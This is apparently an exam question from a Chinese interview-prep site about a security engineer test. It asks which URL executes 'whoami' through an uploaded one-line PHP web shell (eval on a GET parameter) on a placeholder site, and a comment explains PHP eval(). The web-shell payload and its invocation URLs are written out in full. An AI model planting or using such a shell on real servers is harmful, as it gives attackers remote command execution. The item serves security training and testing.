假设某网站www.exploit.com存在文件上传漏洞，p

[单选题]

假设某网站www.exploit.com存在文件上传漏洞，php语言编写，根目录是C:\wwwroot，现构造文件名test.php上传到服务器目录C:\wwwroot\upload下，内容为

<?php @eval($_GET['cmd']);?>

，请问下面的哪条url能够在服务器成功执行whoami命令？

http://www.exploit.com/upload/test.php?cmd=system('whoami');

http://www.exploit.com/test.php?cmd=system('whoami');

http://www.exploit.com/upload/test.php?cmd=whoami

http://www.exploit.com/upload/test.php?eval=system('whoami');

查看正确选项

mark_php

eval() 函数可以将字符串当作php代码来执行，语法为eval(phpcode)

该字符串必须是合法的 PHP 代码，且必须以分号结尾。

如果没有在代码字符串中调用 return 语句，则返回 NULL。如果代码中存在解析错误，则 eval() 函数返回 false。

发表于 2021-04-13 10:04:56 回复(0)

提交观点

问题信息

运维工程师网易 2018 安全工程师

上传者：小小

难度：

1条回答 5收藏 791浏览

扫一扫，把题目装进口袋